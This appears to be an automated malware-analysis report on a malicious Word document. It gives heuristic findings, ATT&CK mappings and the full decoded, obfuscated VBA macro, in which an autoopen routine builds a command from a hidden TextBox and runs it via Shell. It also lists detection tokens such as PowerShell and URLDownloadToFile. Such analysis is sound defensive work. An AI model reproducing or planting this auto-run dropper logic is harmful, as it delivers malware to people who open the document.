Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of a Shell call within the VBA code, suggesting an attempt to execute arbitrary commands. The macro is obfuscated, but the presence of 'autoopen' and 'Shell' calls, along with references to cmd.exe and PowerShell, strongly suggests it's designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Malware.Valyria-6786330-0' further supports its malicious nature.
Heuristics (10)

- ClamAV: Doc.Malware.Valyria-6786330-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6786330-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7708 bytes |

SHA-256: 2cbb8b0926b1c17771262d686168f534df404019329b5c7bc039e72cec21a020

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 213 of 250 identifiers look randomly generated (e.g. 'kfTOukFwHWUGOinhVWiGBXfk'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "lQknRLjWSswoaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
wIkJMutiz
End Sub
Attribute VB_Name = "wEwXqkddllPSQ"
Function wIkJMutiz()
On Error Resume Next
Set qtZYbMPPHkhoaONcofJj = jQOGabknnMCMUwTAVhIwAP
Select Case pJJRtAHrloqGdLRA
Case 244070039
bTXfcGPtbSwBnlUEYwRJ = njVRXdrqpDhXQYvpKhCCzYo
jBFmYmUjboonBOEdXDmPQdW = 83998068
OOPOHrOrbhWYFRDiwvc = HnvdZiwmZcFfsMKXFUTwa
Case 313935757
hiFSlijSitcRbSmpcvb = CByte(zbrfsHfdibfJMNOvT)
KDtKXlPviETirBwd = ChrW(GqZZiDDoGOTFNEqWPlX)
pDFQwYaJzkiKimIEunf = Log(qVRXwqUAcIbPbE)
End Select
Set UtDpjzKEVRRCpWCBLzNUYr = qTqRfwlmpuflJWrKIEf
Select Case joQvoXWljiSPcUN
Case 146343180
iiGjibHKksfTmEQtjpCCuc = bADHcPJpJVUaZZZ
NJlEirRziCWtiKT = 314038808
WfjbTfubDVzRdqU = kptJYdjiFdZtPKwB
Case 163401679
DtqdtiqdbVTfALCjuU = CByte(mjsvAVqFBLsWwtImaTH)
OSvBOOadNqfPibmoKwpHDYoR = ChrW(wXmrZbQnZLTkrhlvNrKfc)
UGTbbdzsqddSPqoloOPcEPS = Log(TRDLpjdmFFDfYz)
End Select
Set TZcSXzscDVzdmoC = fkhjRzfKiZMNouuj
Select Case wYzwfQHjlGHzRiDV
Case 261131958
bbuoUuSkzmioJbNS = PFOAUZDfsXMRvIrAjSHRJE
fuSVBzzjjzpnQZ = 91229143
CqJbWGSCinndIGB = KCiFCEChvrcSFUbbSLEa
Case 5660799
jZcPrNJUYdzLcNqIFwob = CByte(fdzzJMMKzBbdhVJcmMoX)
SzUtsNkJFGlZwBvcRiB = ChrW(JbbWhvshjSlzDDMdfDRzbBrv)
EjTNAUinaSrXwMwUDdnUmW = Log(pSzORBVHjjjdMYTjzHLclUG)
End Select
Set jTDwUwGbmjJEIDfnoRtvqo = afpURFuQVAzKIYiqwXlKTuK
Select Case OwRBatazrccRiipWrQ
Case 260967243
ItXPFazXFdWfVW = SospcaASfvRMSiO
DHGKVbBwzwCtNGzwH = 161216422
izaLdIarUoOfpqLTYO = krmwpjYGEZwUEtMj
Case 129240892
wdBvjhIlQMDCmYiwofvC = CByte(iECVSVTKldJrqckJpHFoE)
LCCmZmIFjlQrRYzZR = ChrW(obijuLwwzmwYqOjO)
zTjwjCjwYawKLJPqtzdkbIr = Log(cpVGIvCKCfAGlPIYwnVkzm)
End Select
Set IOMNtkdzqBIoDt = dzIkpYodnJFVqKmhspQh
Select Case JQVBSYKPrDZwWpYpwHc
Case 132176974
YEoPmoEUPzmMFThmiWAiO = FjZTVOstioMpkMhmjjGvbEmj
VqCPkcpWcwIpTTpbV = 114686649
zPjVEwqRYTUBtqCzXpdzMXTI = ZzNPQTFmpjCmUzTt
Case 71227000
DHzOwQTSlsTlcwaHf = CByte(dBHzOOEGANCrKDBFQBQKwwww)
NTEGFLNSVQJJDsiKrQFPu = ChrW(PjXjZqUzhFJSBvAAuCpZo)
svNJiAHfqjnjDUjZmWzViE = Log(krmKrWDZUsbrbT)
End Select
Set zdMpPMIHwOLhnMPL = SNLQjofSVHrpRECZ
Select Case ovhmhiqAGzTAisCmf
Case 277513001
iwQojXuEQSjKIIZYTdY = iUQcpMRmOpCmOauSXGAPm
ZiZoKsJUiIGEzJjozUFH = 277042229
PuwhNGANcJwAvhCBBYd = GufJdlljHfJfowTfrdfCUVf
Case 324792420
zOzlzThiwVVPnEb = CByte(RFzASMwNXJXtbZkOhC)
XmzJLcBrcwQEZEhCPizn = ChrW(RlOownDWkGhlYEiTwlXRU)
PGFwptWVfkOuFBjVPo = Log(VsrjTBzwjTzZVRzVHjzwJzPb)
End Select
Const XsiLCDnVQ = 0
Set NElwOqSowzjVlnFfmTokB = pvFsuQQRRfwpQqjJkGHAHv
Select Case KjfFPlvsuhbOprWwCYjhB
Case 161699015
XOwcihdBftKvLOKAjWnCIocq = OKEbbOklkHqQIMKQf
UfvLhrXzKOWnimIKUWYZDfaJ = 175697927
TjXKcldsHKWDdMD = EVPwZEIwrosFspFmkaY
Case 265482981
AllKpiznRtLWcbEtiiP = CByte(YSotXASFjSDoPzDjilj)
KLaujjPOBtGrJNDhzrn = ChrW(MsDzqXGdXUOswpQNstMolD)
qLLfCvVmmwuNSH = Log(EJcmrjiOtTzqpEfzDIo)
End Select
Set fcsbQMiQCHOtFzoY = VWvBKoHzDaNEacPYBzBnOJto
Select Case dTnuBtlzEKUCLUolcNmU
Case 78999373
fwVEBnkkMcHYhUUECjb = VSuVpcNClvHTRBo
YzszNUzrunnTQXKFtEGNDz = 93170079
aiwQVoGjjjjFoitAUDb = ptlOlBaMvbkYiT
Case 154795001
WjWFjHmkrFROKFsAYLjj = CByte(kfTOukFwHWUGOinhVWiGBXfk)
BpijAXkrimBCrlWh = ChrW(jiwHwaETDpAZuMAiDtvWMH)
kPjsmiikLZNnwoDFPdQzijSn = Log(AUosbLbcjMsPiSoYEoz)
End Select
Set IVuVwJnzqbQCYWb = lITBGjYLIbAXsobW
Select Case qqiZQiLiBBPfoMGCh
Case 296296185
zBAcwiMXIQFCztlijskV = IWFfJfTPuUKvzXPqOlqD
COwwPlDdZJwXzqf = 309760530
nCtHOvuHBWVrSHtSWGHIjutQ = UKOYzhjvQwoJAnSCrNPhm
Case 44670684
DEdjYmRsIcVulj = CByte(EpmvBIFIWToGojiizNHLT)
zLJzFfhithWIJavqEu = ChrW(vHQjjcLitWjiUPjramBCabsa)
jfXDnIINNYNhccX = Log(AnHMDBtZjUDDsWTOqbwzobF)
End Select
Set YKddUFVHRiLnJKswNm = cUzjZbUiYwBrBJYurMi
Select Case tGOjqjZOJTiBwNSD
Case 173200272
DBAawLPnKdkQAlibfVFO = qBGVERAsnrVTNIhKTJDUCY
dsSsWXhwzMnMzuFstOvWlPwm = 191103109
RLLCtnRFcclZiVGvXHawhPOR = FHCKNvfPZGVkuSAu
Case 305682072
cGTkaQqspMjPBzuso = CByte(PuPjGKEOkKdpZBmwlLqU)
mUVGTiJFYqBdUfzBvAJj = ChrW(jfOzmfdCLiCTzdau)
mbvJLUcLFVnwpLjoVFo = Log(GjCjCMHwJVCYHWN)
End Select
iBSDBPPH = lQknRLjWSswoaR.TextBox1 + zUTEFUq + HqWKwK + aokNE + qAjaFZht + RwQmX + uCDYWtY + fddXOKqG + dECAGrXS + XqiQjEZ + uvwLhku + NdRPOS + hvZmFE
Set NNdGcQIiTSCVHYOUzuUBVZG = LzBQktSrkKklEBwafk
Select Case miSXjoJwKicYnGHufPrzZA
Case 72631735
zncPwwuVlkTotZSbbvHJI = wizGQLomPmXhZvMuzMoGn
nSBFwPWisBcLrz = 114911384
hjhwVhQLAWPhvuVBwtriFLO = QluVENEOcHiEZohGCpF
Case 175768003
pizjbNwFmmWUIi = CByte(mvHmRAEoPQbJLlcQFnYbD)
ocAGIqVIkRGwTHhSJzkuiQAD = ChrW(UJWQhjHjqGfmLrOSHjKDMS)
iniZqJNYcwTojzsChw = Log(cACfzHWbakpAZBnnc)
End Select
Set GNviLTHUVrwpqtPu = QpHAcFWAqBjSbOjZbhZAObZE
Select Case fflFJakuHnwALiHZiURbCud
Case 108125856
OLqujpQCFzZlvhawY = bhYPDSajGHdslCUouO
AXzizFjhojnqfdaBirwIYTz = 232343188
ZNMXQGnMCXvdzaJ = kmATQwOKAmwvGVjXOZ
Case 162020694
UKYczicFiYjRolojzQsazBW = CByte(KrFjrYPaBRBZOXTlVIfc)
fGUhzYwjzsTnuS = ChrW(ZwOGJJPXjOSbwHF)
VubfkkwrzQuEYilUFLMZtZS = Log(PjlThwBYsCztTnXozXGsOLw)
End Select
zWlvjzw = Array(hPBzfKC, VLWlsB, nXbWSa, Interaction _
_
_
_
_
_
_
_
.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)
Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu
Select Case ljktcBiIzSnaprnziwdz
Case 173283479
QVEOzEcDwkGXrXQQtLjX = IDBiWNwEpwuDFSPoN
ifuWDUSAQjSFST = 16938488
HRCjbrizHoLTlEBbf = CrVmAhMVwPljibB
Case 272539931
zmdcmBuOOIwOLhqZ = CByte(RKvVQUWFuPNXKkSw)
DpCfPqaYlZOGlhuKTKqupjR = ChrW(WsljrEYjSRdBXfB)
UwivIzIiSMqabBEWYv = Log(WFtjhBhoUEtnnIW)
End Select
Set wXuzMWPLYADiwbzkPh = MuUwadFFRpHsWZcYdUXJwAo
Select Case azifiwuTuASYdbT
Case 142005449
QwWRIhFTCTQsXwM = OVcwZaUvnzWGDuB
BCfBRpSQZLccdb = 149594902
GSPFrWhqibdKLw = HSPqVRKoYDMZNwrRM
Case 178018776
zkfvJfUpXqLIFavUK = CByte(kBmwiqCizTrmJRjsz)
cWFLBbmzNvGwSihCbZjC = ChrW(otihAwlhuYMbPsn)
ZzKJjdHYwBNEGqJ = Log(wYndadAdBQTWuXDm)
End Select
Set EmWRFHiVQiMEZcmcdB = KfKjKfowRQERHH
Select Case lnFhmrnOKhhNJfWlTkDwotGM
Case 251990940
KMFLREwdrwWwPIWQA = cSfQuflhEJHrhtvVhaJwPdQj
XOWVubYsGjUluSaakznVAR = 194471199
tbwGCjwBzcWQOM = hjwbJbjmIjYfidKn
Case 43792362
VbSfRqWkSlSvJLYoFmBpT = CByte(KpoWiEUYooQftlrCRHE)
IzUMaMHpXYlQRvQdrvM = ChrW(QuzdfiSnzDUtluRMU)
wRwiAPCzNzUOLWvlIOA = Log(jvuUsUErfWiEJPwuWlthajQ)
End Select
End Function